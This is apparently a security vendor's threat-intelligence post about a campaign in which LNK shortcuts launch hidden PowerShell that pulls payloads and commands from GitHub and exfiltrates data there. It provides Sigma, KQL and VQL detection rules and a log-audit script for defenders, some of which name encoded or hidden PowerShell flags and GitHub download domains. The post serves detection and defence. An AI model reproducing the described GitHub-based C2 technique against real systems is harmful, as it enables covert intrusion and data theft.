Back to Intelligence

GitHub Abused as Covert C2: Detecting Multi-Stage LNK and PowerShell Attacks

SA
Security Arsenal Team
April 11, 2026
5 min read

Introduction

Defenders face a sophisticated evolution in command-and-control (C2) infrastructure. Recent intelligence reveals a multi-stage malware campaign actively abusing GitHub as a covert channel for C2 communications and data exfiltration. By leveraging trusted infrastructure like GitHub, attackers bypass traditional network allow-lists and blend in with legitimate development traffic.

The campaign utilizes malicious LNK files (Windows shortcuts) as the initial access vector, which trigger PowerShell scripts to fetch decoders and payloads from GitHub repositories. This technique establishes persistence and facilitates unauthorized data transfer. Because the traffic originates from a trusted domain (github.com), it often evades basic web filtering. Security teams must immediately pivot to hunting for anomalous process behaviors and specific command-line patterns associated with this threat.

Technical Analysis

This attack chain represents a "Living off the Land" (LotL) approach combined with "Living off Trusted Sites" (LotS).

  • Initial Access: The attack begins with a malicious LNK file. When a user executes this file, it does not launch a visible application but instead triggers a hidden command.
  • Execution & Payload Delivery: The LNK file initiates PowerShell. The PowerShell script connects to GitHub to fetch a "decoder" script or a primary payload. This stage allows the attacker to swap payloads without changing the initial LNK file.
  • C2 Infrastructure: Unlike standard malware that connects to a dedicated IP address, this malware uses GitHub repositories, Gists, or Issues to receive commands. The attacker commits code or updates a file in the repo; the malware on the victim machine pulls these updates to execute instructions.
  • Data Exfiltration: Unauthorized data is staged and pushed back to the GitHub repository, appearing as standard code commits or file updates to network inspection tools.
  • Persistence: The campaign utilizes PowerShell profiles or scheduled tasks to ensure the malware survives reboots, continuing to check the GitHub URL for further instructions.

Affected Platforms: Microsoft Windows (all versions supporting PowerShell).

Exploitation Status: Confirmed active exploitation in the wild.

Detection & Response

Detection relies heavily on identifying the context of the process making the network request. While a developer using git.exe to access GitHub is benign, powershell.exe accessing raw.githubusercontent.com or api.github.com directly is a high-fidelity indicator of compromise (IOC) in this context.

SIGMA Rules

YAML
---
title: GitHub C2 - PowerShell Downloading from GitHub
id: 9a8b7c6d-5e4f-3a2b-1c0d-9e8f7a6b5c4d
status: experimental
description: Detects PowerShell processes downloading content from GitHub domains, indicative of payload retrieval or C2 activity as seen in recent campaigns.
references:
  - https://www.infosecurity-magazine.com/news/github-covert-multi-stage-malware/
author: Security Arsenal
date: 2025/04/10
tags:
  - attack.command_and_control
  - attack.t1102.002
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  selection_cmd:
    CommandLine|contains:
      - 'githubusercontent.com'
      - 'api.github.com'
      - 'gist.github.com'
  condition: all of selection_*
falsepositives:
  - Legitimate developers using PowerShell scripts to fetch GitHub releases (verify user context)
level: high
---
title: LNK File Spawning PowerShell
id: 1b2c3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
status: experimental
description: Detects Windows Explorer (LNK execution) spawning PowerShell. This is a common technique in phishing campaigns using LNK files for initial access.
references:
  - https://www.infosecurity-magazine.com/news/github-covert-multi-stage-malware/
author: Security Arsenal
date: 2025/04/10
tags:
  - attack.initial_access
  - attack.t1566.001
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\explorer.exe'
  selection_child:
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
  selection_cmd_cli:
    CommandLine|contains:
      - ' -encoded'
      - ' -w hidden'
      - ' -c '
  condition: all of selection_*
falsepositives:
  - Known system administration scripts triggered by double-click
level: medium

KQL (Microsoft Sentinel / Defender)

KQL — Microsoft Sentinel / Defender
// Hunt for PowerShell processes contacting GitHub domains
// Look for non-browser, non-git-tool processes connecting to GitHub
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has "github.com"
| where InitiatingProcessFileName !in ("chrome.exe", "msedge.exe", "firefox.exe", "git.exe", "ssh.exe", "vscode.exe")
| where InitiatingProcessFileName =~ "powershell.exe" or InitiatingProcessFileName =~ "pwsh.exe"
| project Timestamp, DeviceName, InitiatingProcessAccountId, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteUrl, RemotePort
| order by Timestamp desc

Velociraptor VQL

VQL — Velociraptor
-- Hunt for PowerShell processes with command lines containing GitHub
SELECT Pid, Name, CommandLine, Exe, Username, StartTime
FROM pslist()
WHERE Name =~ "powershell" OR Name =~ "pwsh"
  AND CommandLine =~ "github"

-- Hunt for recent network connections to GitHub established by PowerShell
SELECT RemoteAddress, RemotePort, PID, State, StartTime
FROM netstat()
WHERE RemoteAddress =~ "github"
  AND PID IN (SELECT Pid FROM pslist() WHERE Name =~ "powershell")

Remediation Script (PowerShell)

PowerShell
# Audit Script: Detect potential GitHub C2 activity in recent Script Block logs
# Requires: Script Block Logging must be enabled (Group Policy)

$TargetTime = (Get-Date).AddHours(-24)
$GitHubKeywords = @('githubusercontent.com', 'api.github.com', 'gist.github.com')

$SuspiciousEvents = Get-WinEvent -FilterHashtable @{
    LogName='Microsoft-Windows-PowerShell/Operational'
    ID=4104
    StartTime=$TargetTime
} -ErrorAction SilentlyContinue | Where-Object {
    $Message = $_.Message
    ($GitHubKeywords | Where-Object { $Message -like "*$_*" }).Count -gt 0
}

if ($SuspiciousEvents) {
    Write-Host "[ALERT] Found potential GitHub C2 related PowerShell activity:" -ForegroundColor Red
    $SuspiciousEvents | Select-Object TimeCreated, Id, ProcessId, Message | Format-List
} else {
    Write-Host "[INFO] No suspicious GitHub activity found in the last 24 hours." -ForegroundColor Green
}

Remediation

  1. Enable Script Block Logging: Ensure PowerShell Script Block Logging is enforced via Group Policy to capture the obfuscated commands used in these attacks.
  2. Network Segmentation & Filtering: While blocking GitHub entirely is rarely feasible, configure your proxy or firewall to inspect GitHub API traffic. Restrict access to raw.githubusercontent.com and api.github.com to only approved build servers or developer workstations using User-Agent filtering or certificate-based authentication.
  3. Application Allow-Listing: AppLocker or Windows Defender Application Control (WDAC) policies should be configured to prevent unsigned LNK files from spawning PowerShell or executing arbitrary code.
  4. User Awareness: Train users to recognize LNK files in email attachments, even if the icon appears legitimate. LNK files are a common vector for this type of initial access.
  5. Endpoint Detection Review: Hunt for the specific parent-child process chain (LNK -> PowerShell -> GitHub Network Connection) described in the Detection section.

Related Resources

Security Arsenal Incident Response Services AlertMonitor Platform Book a SOC Assessment incident-response Intel Hub

incident-responseransomwareforensicsgithub-abuselnk-malwarepowershellc2threat-hunting

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action